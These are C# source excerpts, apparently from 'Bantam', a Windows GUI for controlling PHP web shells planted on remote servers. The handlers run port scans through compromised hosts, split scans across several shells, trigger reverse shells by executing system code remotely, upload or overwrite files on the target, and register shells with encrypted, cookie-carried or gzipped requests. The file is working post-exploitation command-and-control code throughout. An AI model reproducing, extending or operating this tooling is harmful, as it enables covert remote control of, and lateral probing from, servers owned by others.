/// <summary>
/// Main port scan routine
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private async void btnScan_Click(object sender, EventArgs e)
{
if (btnScan.Enabled == false)
{
return;
}
string target = textBoxHost.Text;
if (string.IsNullOrEmpty(target) &&
!Helper.IsValidIPv4(target) &&
!Helper.IsValidUri(target))
{
labelDynStatus.Text = "Invalid IP/Url.";
return;
}
btnScan.Enabled = false;
if (BantamMain.Shells.ContainsKey(ShellUrl))
{
string portsCode = string.Empty;
bool encryptResponse = BantamMain.Shells[ShellUrl].ResponseEncryption;
int ResponseEncryptionMode = BantamMain.Shells[ShellUrl].ResponseEncryptionMode;
if (int.TryParse(textBoxPorts.Text, out int outVal))
{
if (!string.IsNullOrEmpty(textBoxPorts.Text))
{
portsCode = "$ports = array('" + textBoxPorts.Text + "');";
labelDynStatus.Text = "";
}
else
{
if (comboBoxCommonPorts.SelectedIndex != 0)
{
if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ONE_TO_1024)
{
portsCode = PhpBuilder.PortsScannerPorts1To1024();
labelDynStatus.Text = "** May fail unless on local IP";
}
else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.COMMON_PORTS)
{
labelDynStatus.Text = "** May fail unless on local IP";
portsCode = PhpBuilder.PortScannerPortsCommon();
}
else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ALL_PORTS)
{
portsCode = PhpBuilder.PortScannerPortsAll();
labelDynStatus.Text = "** May fail unless on local IP";
}
}
}
string phpCode = PhpBuilder.PortScanner(textBoxHost.Text, portsCode, encryptResponse);
BantamMain.ExecutePHPCodeDisplayInRichTextBox(ShellUrl, phpCode, "Opened Ports - " + textBoxHost.Text, encryptResponse, ResponseEncryptionMode);
}
}
btnScan.Enabled = true;
}
/// <summary>
/// Task wrapper for popping reverse shell without chankro
/// </summary>
/// <param name="shellCode"></param>
private async Task PopReverseShell(string shellCode)
{
string phpCode = PhpBuilder.ExecuteSystemCode(shellCode, false);
await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false));
if (checkBoxLogShellCode.Checked)
{
LogHelper.AddShellLog(ShellUrl, "Attempted to pop chankro reverse shell with [ " + shellCode + " ] ", LogHelper.LOG_LEVEL.REQUESTED);
}
}
/// <summary>
/// Main upload routine
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private async void btnUpload_Click(object sender, EventArgs e)
{
string phpCode = string.Empty;
btnBrowse.Enabled = false;
btnUpload.Enabled = false;
richTextBox1.Enabled = false;
if (EditingSelf)
{
if (!string.IsNullOrEmpty(richTextBox1.Text))
{
phpCode = Helper.EncodeBase64ToString(richTextBox1.Text);
}
else
{
LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data to self...", LogHelper.LOG_LEVEL.INFO);
btnUpload.Enabled = true;
return;
}
phpCode = PhpBuilder.WriteFileVar(PhpBuilder.phpServerScriptFileName, phpCode);
}
else
{
if (!string.IsNullOrEmpty(LocalFileLocation))
{
phpCode = Convert.ToBase64String(File.ReadAllBytes(LocalFileLocation));
}
else if (!string.IsNullOrEmpty(richTextBox1.Text))
{
phpCode = Helper.EncodeBase64ToString(richTextBox1.Text);
}
else
{
LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data...", LogHelper.LOG_LEVEL.INFO);
btnUpload.Enabled = true;
return;
}
string remoteFileLocation = ServerPath + "/" + txtBoxFileName.Text;
phpCode = PhpBuilder.WriteFile(remoteFileLocation, phpCode);
}
await WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode);
btnUpload.Enabled = true;
btnBrowse.Enabled = true;
richTextBox1.Enabled = true;
this.Close();
}
/// <summary>
/// Main Distributed scanning routine
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private async void btnScan_Click(object sender, EventArgs e)
{
if (string.IsNullOrEmpty(textBoxTarget.Text))
{
lblStatus.Text = "Invalid IP/Url.";
return;
}
string target = textBoxTarget.Text;
if (!Helper.IsValidIPv4(target) &&
!Helper.IsValidUri(target))
{
lblStatus.Text = "Invalid IP/Url.";
return;
}
if (string.IsNullOrEmpty(textBoxStartPort.Text) ||
string.IsNullOrEmpty(textBoxEndPort.Text))
{
lblStatus.Text = "Invalid port.";
return;
}
int startPort = Convert.ToInt32(textBoxStartPort.Text);
int endPort = Convert.ToInt32(textBoxEndPort.Text);
if (startPort > endPort ||
endPort <= 0 || startPort <= 0 ||
startPort > PORT_MAX || endPort > PORT_MAX)
{
lblStatus.Text = "Invalid port.";
return;
}
btnScan.Enabled = false;
string windowTitle = "Open Ports ( " + target + " )";
RichTextBox rtb = GuiHelper.RichTextBoxDialog(windowTitle, string.Empty);
int shellsCount = checkedListBoxShells.CheckedItems.Count;
int portsPerShell = ((endPort - startPort) / shellsCount);
int iter = 1;
foreach (var checkedItem in checkedListBoxShells.CheckedItems)
{
string portsCode = string.Empty;
string scannedRange = string.Empty;
if (iter == shellsCount)
{
if (iter == 1)
{
scannedRange = startPort.ToString() + ", " + (endPort).ToString();
portsCode = "$ports = range(" + scannedRange + ");";
}
else
{
scannedRange = (((iter - 1) * portsPerShell) + 1).ToString() + ", " + (endPort).ToString();
portsCode = "$ports = range(" + scannedRange + ");";
}
}
else
{
if (iter == 1)
{
scannedRange = startPort.ToString() + ", " + (iter * portsPerShell).ToString();
portsCode = "$ports = range(" + scannedRange + ");";
}
else
{
scannedRange = (((iter - 1) * portsPerShell) + 1).ToString() + ", " + (iter * portsPerShell).ToString();
portsCode = "$ports = range(" + scannedRange + ");";
}
iter++;
}
bool encryptResponse = true;
string shellUrl = checkedListBoxShells.GetItemText(checkedItem);
string responseText = "[" + shellUrl + "] - returned ports (" + scannedRange + ") - \r\n";
string phpCode = PhpBuilder.PortScanner(target, portsCode, encryptResponse);
lblStatus.Text = "Scanning.";
BantamMain.ExecutePHPCodeDisplayInRichTextBox(shellUrl, phpCode, windowTitle, encryptResponse, (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL, false, rtb, responseText);
btnScan.Enabled = true;
}
}
/// <summary>
/// Main add shell/host To GUI routine
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private async void btnAddShell_Click(object sender, EventArgs e)
{
string shellURL = txtBoxShellUrl.Text;
if (string.IsNullOrEmpty(shellURL))
{
return;
}
if (checkBoxEncryptRequest.Checked)
{
string encryptionKey = textBoxEncrpytionKey.Text;
if (encryptionKey.Length != 32)
{
labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
return;
}
if (!checkBoxSendIVInRequest.Checked)
{
string encryptionIV = textBoxEncrpytionIV.Text;
if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16)
{
labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
return;
}
}
}
//Remove Shell
if (BantamMain.Shells.ContainsKey(shellURL))
{
BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);
if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut))
{
LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
return;
}
}
//Add Shell
if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo()))
{
LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
return;
}
BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text;
if (comboBoxVarType.Text == "cookie")
{
BantamMain.Shells[shellURL].SendDataViaCookie = true;
}
if (checkBoxResponseEncryption.Checked == false)
{
BantamMain.Shells[shellURL].ResponseEncryption = false;
}
else
{
BantamMain.Shells[shellURL].ResponseEncryption = true;
BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
}
if (checkBoxGZipRequest.Checked)
{
BantamMain.Shells[shellURL].GzipRequestData = true;
}
else
{
BantamMain.Shells[shellURL].GzipRequestData = false;
}
bool encryptResponse = BantamMain.Shells[shellURL].ResponseEncryption;
int ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode;
if (checkBoxEncryptRequest.Checked)
{
BantamMain.Shells[shellURL].RequestEncryption = true;
BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text;
if (checkBoxSendIVInRequest.Checked)
{
BantamMain.Shells[shellURL].SendRequestEncryptionIV = true;
BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty;
BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
}
else
{
BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text;
BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
}
}
else
{
BantamMain.Shells[shellURL].RequestEncryption = false;
BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty;
BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty;
}
string phpCode = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);
if (string.IsNullOrEmpty(response.Result))
{
labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
return;
}
string result = response.Result;
if (encryptResponse)
{
result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode);
}
if (string.IsNullOrEmpty(result) || result != "1")
{
labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
return;
}
BantamMain.Instance.InitializeShellData(shellURL);
this.Close();
}
